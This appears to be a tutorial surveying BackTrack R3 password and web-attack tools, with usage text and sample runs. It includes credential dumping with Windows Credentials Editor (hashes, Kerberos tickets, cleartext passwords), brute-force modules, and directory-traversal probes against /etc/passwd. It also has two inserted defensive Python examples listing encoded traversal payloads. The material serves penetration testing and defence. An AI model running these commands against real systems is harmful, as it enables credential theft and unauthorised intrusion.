-c lst_file: use .lst (cain format) file as input
-r [-s session_name]: resume from previous session, optional session name
rainbow_table_pathname: pathname(s) of the rainbow table(s)

Extra options: -t [nr] use this amount of threads/cores, default is 1
-o [output_file] write (temporary) results to this file
-s [session_name] write session data with this name
-k keep precalculation on disk
-m [megabytes] limit memory usage
-v show debug information

example: rcracki_mt -h 5d41402abc4b2a76b9719d911017c592 -t 2 [path]/MD5
rcracki_mt -l hash.txt [path_to_specific_table]/*
rcracki_mt -f hash.txt -t 4 -o results.txt *.rti

13. wce - Windows Credentials Editor v1.3beta (32-bit)

Windows Credentials Editor provides the following options:

Options:
-l List logon sessions and NTLM credentials (default).
-s Changes NTLM credentials of current logon session.
Parameters: :::.
-r Lists logon sessions and NTLM credentials indefinitely.
Refreshes every 5 seconds if new sessions are found.
Optional: -r.
-c Run in a new session with the specified NTLM credentials.
Parameters: .
-e Lists logon sessions NTLM credentials indefinitely.
Refreshes every time a logon event occurs.
-o saves all output to a file.
Parameters: .
-i Specify LUID instead of use current logon session.
Parameters: .
-d Delete NTLM credentials from logon session.
Parameters: .
-a Use Addresses.
Parameters:
-f Force 'safe mode'.
-g Generate LM & NT Hash.
Parameters: .
-K Dump Kerberos tickets to file (unix & 'windows wce' format)
-k Read Kerberos tickets from file and insert into Windows cache
-w Dump cleartext passwords stored by the digest authentication package
-v verbose output.

Examples:

* List current logon sessions

C:\>wce -l
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

meme:meme:11111111111111111111111111111111:11111111111111111111111111111111

* List current logon sessions with verbose output enabled

C:\>wce -l -v
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Current Logon Session LUID: 00064081h
Logon Sessions Found: 8
WIN-REK2HG6EBIS\auser:NTLM
LUID:0006409Fh
WIN-REK2HG6EBIS\auser:NTLM
LUID:00064081h
NT AUTHORITY\ANONYMOUS LOGON:NTLM
LUID:00019137h
NT AUTHORITY\IUSR:Negotiate
LUID:000003E3h
NT AUTHORITY\LOCAL SERVICE:Negotiate
LUID:000003E5h
WORKGROUP\WIN-REK2HG6EBIS$:Negotiate
LUID:000003E4h
\:NTLM
LUID:0000916Ah
WORKGROUP\WIN-REK2HG6EBIS$:NTLM
LUID:000003E7h

00064081:meme:meme:11111111111111111111111111111111:11111111111111111111111111111111

* Change NTLM credentials associated with current logon session

C:\>wce -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Changing NTLM credentials of current logon session (00064081h) to:
Username: auser
domain: admin
LMHash: 99999999999999999999999999999999
NTHash: 99999999999999999999999999999999
NTLM credentials successfully changed!

* Add/Change NTLM credentials of a logon session (not the current one)

C:\>wce -i 3e5 -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Changing NTLM credentials of logon session 000003E5h to:
Username: auser
domain: admin
LMHash: 99999999999999999999999999999999
NTHash: 99999999999999999999999999999999
NTLM credentials successfully changed!

* Delete NTLM credentials associated with a logon session

C:\>wce -d 3e5
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

NTLM credentials successfully deleted!

* Run WCE indefinitely, waiting for new credentials/logon sessions.
Refresh is performed every time a logon event is registered in the Event Log.

C:\>wce -e

* Run WCE indefinitely, waiting for new credentials/logon sessions
Refresh is every 5 seconds by default.

C:\>wce -r

* Run WCE indefinitely, waiting for new credentials/logon sessions, but refresh every 1 second (by default wce refreshes every 5 seconds)

C:\>wce -r5

* Generate LM & NT Hash.

C:\>wce -g test

WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Password: test
Hashes: 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537

* Dump Kerberos tickets to file (unix & 'windows wce' format)

C:\>wce -K
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Converting and saving TGT in UNIX format to file wce_ccache...
Converting and saving tickets in Windows WCE Format to file wce_krbtkts..
5 kerberos tickets saved to file 'wce_ccache'.
5 kerberos tickets saved to file 'wce_krbtkts'.
Done!

* Read Kerberos tickets from file and insert into Windows cache

C:\>wce -k
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Reading kerberos tickets from file 'wce_krbtkts'...
5 kerberos tickets were added to the cache.
Done!

* Dump cleartext passwords stored by the Digest Authentication package

C:\>wce -w
WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

test\MYDOMAIN:mypass1234
NETWORK SERVICE\WORKGROUP:test

13. creddump

creddump is a python tool to extract various credentials and secrets from
Windows registry hives. It currently extracts:
* LM and NT hashes (SYSKEY protected)
* Cached domain passwords
* LSA secrets

root@bt:/pentest/passwords/creddump# ./cachedump.py
usage: ./cachedump.py

14. hash-identifier

root@bt:/pentest/passwords/hash-identifier# ./hash_id.py
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################

-------------------------------------------------------------------------
HASH:

15. smbexec

root@bt:/pentest/passwords/smbexec# ./smbexec.sh
cp: cannot stat `/pentest/passwords/smbexec/progs/patches/smb.conf': No such file or directory

************************************************************
smbexec - v1.0.9
A rapid psexec style attack with samba tools
Original Concept and Script by Brav0Hax & Purehate
Codename - Diamond in the Rough
Gonna pha-q up - PurpleTeam Smash!
************************************************************

1. Local Account
2. Domain Account
3. Create a host list
4. Enumerate Shares
5. Exit
Choice :
************************************************************

16. johnny - GUI for John the Ripper

root@bt:/pentest/passwords/johnny# ./johnny

17. patator

root@bt:/pentest/passwords/patator# ./patator.py
Usage:
$ ./patator.py module --help
or
$ ln -s patator.py module
$ ./module --help

Available modules:
+ ftp_login : Brute-force FTP authentication
+ ssh_login : Brute-force SSH authentication
+ telnet_login : Brute-force Telnet authentication
+ smtp_login : Brute-force SMTP authentication
+ smtp_vrfy : Enumerate valid users using SMTP VRFY
+ smtp_rcpt : Enumerate valid users using SMTP RCPT TO
+ http_fuzz : Fuzz HTTP/HTTPS
+ pop_passd : Brute-force poppassd authentication (http://netwinsite.com/poppassd/ not POP3)
+ smb_login : Brute-force SMB authentication
+ ldap_login : Brute-force LDAP authentication
+ mssql_login : Brute-force MSSQL authentication
+ oracle_login : Brute-force Oracle authentication
+ mysql_login : Brute-force MySQL authentication
+ pgsql_login : Brute-force PostgreSQL authentication
+ vnc_login : Brute-force VNC authentication
+ dns_reverse : Reverse lookup subnets
+ dns_forward : Forward lookup subdomains
+ snmp_login : Brute-force SNMP v1/2/3 authentication
+ unzip_pass : Brute-force the password of encrypted ZIP files
+ keystore_pass : Brute-force the password of Java keystore files

18. statsprocessor

root@bt:/pentest/passwords/statsprocessor# ./sp32.bin --help
sp by atom, High-Performance word generator based on hashcat markov stats

Usage: ./sp32.bin [options]... hcstat-file [filter-mask]

* Startup:

-V, --version Print version
-h, --help Print help

* Increment:

--pw-min=NUM Start incrementing at NUM
--pw-max=NUM Stop incrementing at NUM

* Markov:

--markov-disable Emulates maskprocessor output
--markov-classic No per-position tables
--threshold=NUM Filter out chars after NUM chars added
Set to 0 to disable

* Misc:

--combinations Calculate number of combinations
--hex-charset Assume charset is given in hex

* Resources:

-s, --skip=NUM skip number of words (for restore)
-l, --limit=NUM limit number of words (for distributed)

* Files:

-o, --output-file=FILE Output-file

* Custom charsets:

-1, --custom-charset1=CS User-defineable charsets
-2, --custom-charset2=CS Example:
-3, --custom-charset3=CS --custom-charset1=?dabcdef
-4, --custom-charset4=CS sets charset ?1 to 0123456789abcdef

* Built-in charsets:

?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = !"#$%&'()*+,-./:;?@[\]^_`{|}~
?a = ?l?u?d?s
?h = 8 bit characters from 0xc0 - 0xff
?D = 8 bit characters from german alphabet
?F = 8 bit characters from french alphabet
?R = 8 bit characters from russian alphabet

Backtrack R2

root@bt:/pentest/web# ls
asp-auditor fimap owasp-zap sslstrip wapiti xsser
beef grabber padbuster uniscan webscarab xssfuzz
blindelephant grendel-scan powerfuzzer untidy websecurify
burpsuite mantra proxystrike vega webslayer
darkmysqli mopest scanners w3af wfuzz
dirbuster nikto skipfish waffit wpscan

Backtrack R3

root@bt:/pentest/web# ls
asp-auditor blindelephant dirb dpscan grabber joomscan nikto plecost scanners sslyze vega wapiti webslayer xsser
backdoors burpsuite dirbuster fimap grendel-scan mantra owasp-zap powerfuzzer skipfish uniscan w3af webscarab wfuzz xssfuzz
beef darkmysqli dotdotpwn golismero htexploit mopest padbuster proxystrike sslstrip untidy waffit websecurify

8 new tools in web

1. dirb
2. dpscan
3. plecost
4. sslyze
5. backdoors
6. dotdotpwn
7. golismero
8. htexploit

1. dirb - is a Web Content Scanner. It looks for existing (and/or hidden) Web
Objects. It basically works by launching a dictionary based attack against
a web server and analyzing the response.

root@bt:/pentest/web/dirb# ./dirb http://IP-Address/dvwa/ wordlists/small.txt -w

-----------------
DIRB v2.03
By The Dark Raver
-----------------

START_TIME: Thu Feb 16 11:18:43 2012
URL_BASE: http://IP-Address/dvwa/
WORDLIST_FILES: wordlists/small.txt
OPTION: Not Stoping on warning messages

-----------------

GENERATED WORDS: 957

---- Scanning URL: http://IP-Address/dvwa/ ----
+ http://IP-Address/dvwa/con
(FOUND: 403 [Forbidden] - Size: 1125)
+ http://IP-Address/dvwa/config/
==> DIRECTORY
+ http://IP-Address/dvwa/docs/
==> DIRECTORY
+ http://IP-Address/dvwa/external/
==> DIRECTORY
+ http://IP-Address/dvwa/nul
(FOUND: 403 [Forbidden] - Size: 1125)

---- Entering directory: http://IP-Address/dvwa/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
+ http://IP-Address/dvwa/config/con
(FOUND: 403 [Forbidden] - Size: 1125)
+ http://IP-Address/dvwa/config/nul
(FOUND: 403 [Forbidden] - Size: 1125)

---- Entering directory: http://IP-Address/dvwa/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
+ http://IP-Address/dvwa/docs/con
(FOUND: 403 [Forbidden] - Size: 1125)
+ http://IP-Address/dvwa/docs/nul
(FOUND: 403 [Forbidden] - Size: 1125)

---- Entering directory: http://IP-Address/dvwa/external/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
+ http://IP-Address/dvwa/external/con
(FOUND: 403 [Forbidden] - Size: 1125)
+ http://IP-Address/dvwa/external/nul
(FOUND: 403 [Forbidden] - Size: 1125)

-----------------
DOWNLOADED: 3828 - FOUND: 8
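A dictionary scan like the dirb run above leaves a tight cluster of 403/404 responses from one client in the web server's access log, which is the signal a defender can alert on. The following is an added detection example, not part of the original post or of dirb; the Apache combined-format log lines and the IP addresses in it are constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache "combined" log format (client, timestamp, request line, status, size, ...).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample log: 10.0.0.5 behaves like a dictionary scanner (guessed paths,
# mostly 403/404 in quick succession); 10.0.0.9 is an ordinary visitor.
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Feb/2012:11:18:43 +0000] "GET /dvwa/con HTTP/1.1" 403 1125 "-" "-"',
    '10.0.0.9 - - [16/Feb/2012:11:18:44 +0000] "GET /dvwa/login.php HTTP/1.1" 200 1289 "-" "-"',
    '10.0.0.5 - - [16/Feb/2012:11:18:44 +0000] "GET /dvwa/nul HTTP/1.1" 403 1125 "-" "-"',
    '10.0.0.5 - - [16/Feb/2012:11:18:44 +0000] "GET /dvwa/admin HTTP/1.1" 404 289 "-" "-"',
    '10.0.0.5 - - [16/Feb/2012:11:18:45 +0000] "GET /dvwa/backup HTTP/1.1" 404 289 "-" "-"',
    '10.0.0.5 - - [16/Feb/2012:11:18:45 +0000] "GET /dvwa/config/ HTTP/1.1" 200 2048 "-" "-"',
    '10.0.0.9 - - [16/Feb/2012:11:18:46 +0000] "GET /dvwa/favicon.ico HTTP/1.1" 404 289 "-" "-"',
    '10.0.0.5 - - [16/Feb/2012:11:18:46 +0000] "GET /dvwa/test HTTP/1.1" 404 289 "-" "-"',
    'this line is not a valid log record and is skipped',
]


def parse_line(line):
    """Return (ip, datetime, path, status) or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), TS_FMT)
    return m.group("ip"), ts, m.group("path"), int(m.group("status"))


def find_dictionary_scans(lines, window_s=10, threshold=5):
    """Flag clients that produce >= threshold 403/404 responses within window_s seconds.

    A dictionary scanner requests many guessed paths in quick succession and most of
    them miss, so a dense run of 4xx responses from a single client is the signal.
    Returns {ip: (first_ts, last_ts, distinct_paths)} for the clients flagged.
    """
    recent = defaultdict(deque)   # ip -> deque of (ts, path), 403/404 only
    hits = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, path, status = rec
        if status not in (403, 404):
            continue
        q = recent[ip]
        q.append((ts, path))
        while (ts - q[0][0]).total_seconds() > window_s:   # drop entries outside window
            q.popleft()
        if len(q) >= threshold and ip not in hits:
            hits[ip] = (q[0][0], ts, len({p for _, p in q}))
    return hits


def sample_hits():
    """Run the detector over the constructed sample log."""
    return find_dictionary_scans(SAMPLE_LOG)


if __name__ == "__main__":
    for ip, (first, last, n) in sample_hits().items():
        print(f"{ip}: {n} distinct missing paths between {first:%H:%M:%S} and {last:%H:%M:%S}")
```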

2. dpscan - Several CMSs (content management systems) are in use, such as wordpress, Joomla, light CMS and Drupal. The security of each CMS is very important, and from a penetration tester's point of view we help make a website secure by doing a penetration test on it.

root@bt:~/Desktop# python DPScan.py www.site-to-test.co.uk
node
user_optin
fckeditor
system
gsa
mtv_videobrowse
nice_menus
user
cck
top_tabs
panels
jquery_update
root@bt:~/Desktop#

3. plecost

root@bt:/pentest/web/plecost# ./plecost-0.2.2-9-beta.py

////////////////////////////////////////////
// ..................................DMI...
// .............................:MMMM......
// .........................$MMMMM:........
// .........M.....,M,=NMMMMMMMMD...........
// ........MMN...MMMMMMMMMMMM,.............
// .......MMMMMMMMMMMMMMMMM~...............
// .......MMMMMMMMMMMMMMM..................
// ....?MMMMMMMMMMMMMMMN$I.................
// .?.MMMMMMMMMMMMMMMMMMMMMM...............
// .MMMMMMMMMMMMMMN........................
// 7MMMMMMMMMMMMMON$.......................
// ZMMMMMMMMMMMMMMMMMM.......plecost.......
// .:MMMMMMMZ~7MMMMMMMMMO..................
// ....~+:.................................
//
// Plecost - WordPress finger printer Tool (with threads support) 0.2.2-9-beta
//
// Developed by:
// Francisco Jesus Gomez aka (ffranz@iniqua.com)
// Daniel Garcia Garcia (dani@iniqua.com)
//
// Info: http://iniqua.com/labs/
// Bug report: plecost@iniqua.com

Usage: ./plecost-0.2.2-9-beta.py [options] [ URL | [-l num] -G]

Google search options:
-l num : Limit number of results for each plugin in google.
-G : Google search mode

Options:
-n : Number of plugins to use (Default all - more than 7000).
-c : Check plugins only with CVE associated.
-R file : Reload plugin list. Use -n option to control the size (This take several minutes)
-o file : Output file. (Default "output.txt")
-i file : Input plugin list. (Need to start the program)
-s time : Min sleep time between two probes. Time in seconds. (Default 10)
-M time : Max sleep time between two probes. Time in seconds. (Default 20)
-t num : Number of threads. (Default 1)
-h : Display help. (More info: http://iniqua.com/labs/)

Examples:

* Reload first 5 plugins list:
plecost -R plugins.txt -n 5
* Search vulnerable sites for first 5 plugins:
plecost -n 5 -G -i plugins.txt
* Search plugins with 20 threads, sleep time between 12 and 30 seconds for www.example.com:
plecost -i plugin_list.txt -s 12 -M 30 -t 20 -o results.txt www.example.com

4. sslyze

Better, faster scanner to analyze the configuration of SSL servers.

Supports cipher suites scanning, insecure renegotiation verification, session resumption testing, client certificates, and more...
Tested on Python 2.6 & 2.7 with Ubuntu and Windows 7, both 32 and 64 bits. Might work on other platforms as well.
Based on OpenSSL and a custom SSL Python wrapper.

root@bt:/pentest/web/sslyze# ./sslyze.py IP-Address

REGISTERING AVAILABLE PLUGINS
-----------------------------

PluginOpenSSLCipherSuites - OK
PluginCertInfo - OK
PluginSessionRenegotiation - OK
PluginSessionResumption - OK

CHECKING HOST(S) AVAILABILITY
-----------------------------

IP-Address:443 => IP-Address:443

SCAN COMPLETED IN 0.15 S
------------------------

5. backdoors

6. dotdotpwn

root@bt:/pentest/web/dotdotpwn# ./dotdotpwn.pl -m http -h IP-Address
#################################################################################
# #
# CubilFelino Chatsubo #
# Security Research Lab and [(in)Security Dark] Labs #
# chr1x.sectester.net chatsubo-labs.blogspot.com #
# #
# pr0udly present: #
# #
# ________ __ ________ __ __________ #
# \______ \ ____ _/ |_\______ \ ____ _/ |_\______ \__ _ __ ____ #
# | | \ / _ \\ __\| | \ / _ \\ __\| ___/\ \/ \/ // \ #
# | ` \( )| | | ` \( )| | | | \ /| | \ #
# /_______ / \____/ |__| /_______ / \____/ |__| |____| \/\_/ |___| / #
# \/ \/ \/ #
# - DotDotPwn v3.0 - #
# The Directory Traversal Fuzzer #
# http://dotdotpwn.sectester.net #
# dotdotpwn@sectester.net #
# #
# by chr1x & nitr0us #
#################################################################################

[+] Report name: Reports/IP-Address_08-16-2012_11-46.txt

[========== TARGET INFORMATION ==========]
[+] Hostname: IP-Address
[+] Protocol: http
[+] Port: 80

[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (generic)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 14640

[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)

[*] HTTP Status: 400 | Testing Path: http://IP-Address:80/../etc/passwd
[*] HTTP Status: 400 | Testing Path: http://IP-Address:80/../etc/issue
[*] HTTP Status: 400 | Testing Path: http://IP-Address:80/../boot.ini
[*] HTTP Status: 400 | Testing Path: http://IP-Address:80/../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: http://IP-Address:80/../../etc/passwd
^C
[+] Total Traversals found: 0
[-] Fuzz testing aborted
[+] Report saved: Reports/IP-Address_08-16-2012_11-46.txt
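dotdotpwn's engine varies the dots, slashes, backslashes and encodings in each traversal pattern, so a server-side check must decode and normalise a request path before deciding whether it stays under the web root. As an added example that is not part of the original post or of dotdotpwn, the naive resolver below sits beside a hardened one; the web root and the request paths are constructed for the example.

```python
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/var/www/dvwa"   # constructed document root for this example

# Constructed request paths of the kinds a traversal fuzzer sends, plus legitimate ones.
SAMPLE_REQUESTS = [
    "/vulnerabilities/sqli/index.php",       # legitimate
    "/docs/../config/config.inc.php",        # legitimate: '..' stays inside the root
    "/../etc/passwd",                        # plain traversal
    "/..%2f..%2f..%2fetc/passwd",            # URL-encoded slashes
    "/..\\..\\boot.ini",                     # backslashes (Windows-style)
    "/%252e%252e/%252e%252e/etc/issue",      # double-encoded dots
    "/etc/passwd%00.png",                    # null byte before a fake extension
]


def naive_resolve(request_path):
    """Vulnerable: joins the request path under the root and trusts the result.

    '..' components are collapsed by normpath, so the result can leave WEB_ROOT.
    """
    return posixpath.normpath(posixpath.join(WEB_ROOT, request_path.lstrip("/")))


def safe_resolve(request_path):
    """Hardened: decode repeatedly, fold backslashes, normalise, then check containment.

    Returns the filesystem path to serve, or None when the request must be rejected.
    """
    decoded = request_path
    for _ in range(3):                 # bounded: %252e -> %2e -> '.' covers double encoding
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if "\x00" in decoded:              # null byte: never a valid file name component
        return None
    decoded = decoded.replace("\\", "/")
    root = posixpath.normpath(WEB_ROOT)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    # Containment check on the normalised path, not on the raw request string.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


def classify(requests=SAMPLE_REQUESTS):
    """Map each request to ('allowed', path) or ('rejected', None) per the hardened resolver."""
    out = {}
    for req in requests:
        resolved = safe_resolve(req)
        out[req] = ("allowed", resolved) if resolved is not None else ("rejected", None)
    return out


if __name__ == "__main__":
    for req, (verdict, path) in classify().items():
        print(f"{verdict:8} {req!r:40} naive={naive_resolve(req)} safe={path}")
```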

7. golismero - helps you map a web application, displaying the results in a format convenient for a security auditor and preparing them for integration with other web hacking tools such as w3af, wfuzz, netcat, nikto, etc.

root@bt:/pentest/web/golismero# ./GoLismero.py -h
/pentest/web/golismero/libs/updater.py:5: DeprecationWarning: the md5 module is deprecated; use hashlib instead
import md5

GoLISMERO - The Web Knife.

Daniel Garcia Garcia - dani@iniqua.com | dani@estotengoqueprobarlo.es

usage: GoLismero.py [-h] [-R RECURSIVITY] [-t TARGET] [-o OUTPUT]
[-F {text,html,csv,xml,scripting,wfuzz}]
[-A {all,forms,links}] [-V] [-c] [-x] [-m] [-na] [-nc]
[-ns] [-ni] [-nm] [-nl] [-l] [-us HTTP_AUTH_USER]
[-ps HTTP_AUTH_PASS] [-C COOKIE] [-P PROXY] [-U]
[-f FINGER] [--follow]

optional arguments:
-h, --help show this help message and exit
-R RECURSIVITY recursivity level of spider. Default=0
-t TARGET target web site.
-o OUTPUT output file.
-F {text,html,csv,xml,scripting,wfuzz}
output format. "scripting" is perfect to combine with
awk,cut,grep.... default=text
-A {all,forms,links} Scan only forms, only links or both. Default=all
-V Show version.
-c colorize output. Default=No
-x, --search-vulns looking url potentially dangerous and bugs. As default
not selected
-m, --compat-mode show results as compact format. As default not
selected.
-na, --no-all implies no-css, no-script, no-images and no-mail. As
default not selected.
-nc, --no-css don't get css links. As default not selected.
-ns, --no-script don't get script links. As default not selected.
-ni, --no-images don't get images links. As default not selected.
-nm, --no-mail don't get mails (mailto: tags). As default not
selected.
-nl, --no-unparam-links
don't get links that have not parameters. As default
not selected.
-l, --long-summary detailed summary of process. As default not selected.
-us HTTP_AUTH_USER, --http-auth-user HTTP_AUTH_USER
set http authenticacion user. As default is empty.
-ps HTTP_AUTH_PASS, --http-auth-pass HTTP_AUTH_PASS
set http authenticacion pass. As default not empty.
-C COOKIE, --cookie COOKIE
set custom cookie. As default is empty.
-P PROXY, --proxy PROXY
set proxy, as format: IP:PORT. As default is empty.
-U, --update update Golismero.
-f FINGER, --finger FINGER
fingerprint web aplication. As default not selected.
(not implemented yet)
--follow follow redirect. As default not redirect.

Examples:
- GoLISMERO.py -t site.com -c
- GoLISMERO.py -t site.com -c -A links -x
- GoLISMERO.py -t site.com -m -c -A links -o results.html -F html -x
- GoLISMERO.py -t site.com -c -A links -o wfuzz_script.sh -F wfuzz
- GoLISMERO.py -t site.com -A links --no-css --no-script --no-images --no-mail -c -x
or GoLISMERO.py -t site.com -A links -nc -ns -ni -nm
or GoLISMERO.py -t site.com -A links --no-all
or GoLISMERO.py -t site.com -A links -na

For more examples you can see EXAMPLES.txt

root@bt:/pentest/web/golismero# ./GoLismero.py -t IP-Address
/pentest/web/golismero/libs/updater.py:5: DeprecationWarning: the md5 module is deprecated; use hashlib instead
import md5

GoLISMERO - The Web Knife.

Daniel Garcia Garcia - dani@iniqua.com | dani@estotengoqueprobarlo.es

[ http://IP-Address ]

Links
=====
[L1] /dvwa/

Forms
=====

Total links: 1
Total Forms: 0

root@bt:/pentest/web/golismero#

8. htexploit

root@bt:/pentest/web/htexploit# ./htexploit -u http://IP-Address/dvwa/vulnerabilities/sqli/

.:: .:: .::: .:::::: .:::::::: .:: .::
.:: .:: .:: .:: .:: .: .::
.:: .:: .:: .:: .:: .:: .: .:: .:: .:: .:.: .:
.:::::: .:: .:: .:::::: .: .:: .: .:: .:: .:: .:: .:: .::
.:: .:: .:: .:: .: .: .:: .:: .:: .:: .:: .::
.:: .:: .:: .:: .: .:: .:: .:: .:: .:: .:: .:: .::
.:: .:: .:: .:::::::: .:: .:: .:: .::: .:: .:: .::
.::
v0.7b

[-] http://IP-Address/dvwa/vulnerabilities/sqli/ is probably NOT exploitable :(
You should run the 'full' module anyway, just in case.

Would you like to run the 'full' scan module? [Y/n] y
I/O error on writing output file, do you have permissions?

[+] Full Scan Completed.
[+] 1 files were downloaded, out of 750 (0% success rate). Report was saved in '/pentest/web/htexploit/htexploit-07931'

root@bt:/pentest/web/htexploit# ./htexploit -h

| | __ __| ____| | _) |
| | | __| \ \ / __ \ | _ \ | __|
___ | | | ` < | | | ( | | |
_| _| _| _____| _/\_\ .__/ _| \___/ _| \__|
_| v0.7b

Usage: htexploit -u [URL] [options]

Options:
-h, --help show this help message and exit
-m MODULE, --module=MODULE
Select the module to run (Default: detect)
-u URL, --url=URL **REQUIRED** - Specify the URL to scan
-o OUTPUT, --output=OUTPUT
Specify the output directory
-w WORDLIST, --wordlist=WORDLIST
Specify the wordlist to use
-v, --verbose Be verbose
root@bt:/pentest/web/htexploit#
